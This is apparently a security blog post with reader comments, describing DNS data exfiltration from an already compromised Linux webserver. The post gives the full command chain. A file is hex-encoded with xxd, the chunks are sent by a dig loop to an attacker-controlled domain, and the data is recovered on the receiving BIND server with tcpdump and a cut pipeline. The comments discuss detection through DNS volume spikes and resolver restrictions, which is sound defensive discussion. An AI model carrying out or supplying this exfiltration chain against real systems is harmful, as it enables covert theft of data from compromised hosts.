Post Exploitation: DNS Data Exfiltration

If you have compromised a Linux webserver (for example) and wanted to exfiltrate data from said server, consider the below method using DNS requests:

First, before we begin, we need to have a place to send our the data that we need to exfil. For that, we’re using a public server running BIND.  If you need to snag a copy of BIND:

sudo apt install bind9

The service will probably start automagically after installation. Also, because our server is behind NAT, we had to setup a port forwarding rule back to our internal DNS server on port 53.

The goal is to exfil a below GIF image from our already compromised webserver:

Capture1.JPG

First, we need to hex encode the image using the below command:

xxd -p linux.gif > linux.gif.hex

Capture2.JPG

Now that the file is encoded (as seen above), we need make sure we’re able to capture the DNS requests on the receiving end.  On our DNS server, we can fire up a tcpdump probe:

sudo tcpdump -i eth0 -s0 -w capture1.pcap port 53

Capture3

Back on our compromised host, we can begin to exil the file using the below command:

for b in `cat linux.gif.hex`; do dig @aws.shellgam3.com $b.shellgam3.com; done

The exfiltration process as seen on the compromised host:

Capture4.JPG

On our DNS server, we can run the following command to make sure we have captured data:

tcpdump -n -r capture1.pcap | grep shellgam3.com

This should output hundreds of lines of text that look similar to the below:

Capture5

Before this information can be reverse the hex encoding, we first need to strip out everything from our PCAP file and return it back to the original hex file.  We can use the below one-liner to achieve this:

tcpdump -r capture1.pcap -n | grep shellgam3.com | cut -f9 -d’ ‘ | cut -f1 -d’.’ | uniq > linux.gif.hex

Capture6

Finally, we need to reverse the hex encoding to return our file to it’s original state:

Capture7

After copying the file to /var/www/html/files, we can use our web browser to make sure the file has been returned to it’s original state and viewable:

Capture8

Below is the Wireshark output that was captured on the compromised host side while the exfil was taking place:

Capture9

Advertisements

6 thoughts on “Post Exploitation: DNS Data Exfiltration

  1. Thanks a lot for the great article. It is a good inspiration for developing security monitoring.
    I tried to find same pattern of hex strings shown in the different screen shots, but without success? It seems that the images are taken at different time?!

    Like

    1. Malle, this type of exfiltration will generate an extremely high amount of outbound DNS requests. If you’re tracking that sort of thing by host, you should be able to see the spike when compared against other hosts. I’m not an expert in this arena, but that’s how I would initially approach detection. I wouldn’t doubt if there’s a better option though.

      Like

  2. with dns lookup over udp, i believe you can get max 512 bytes per request. this might not work if we have layer 7 inspection. it will detect it as a non dns packet. the assumption here is outbound dns is allowed from the compromised host. for a secure environment, dns queries will only be allowed from the corporate dns server

    Like

  3. Thanks for the great article, this concept and method demonstrates how creativity is key with new attack vectors. Higher skilled attackers are those who leverage knowledge of an operating system and it’s ‘features’ to his advantage. There is no need to drop binaries on machines and risk detection when things such as Powershell are just as powerful to the attacker as to the defender. Great blog, keep up the great posts.

    Like

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s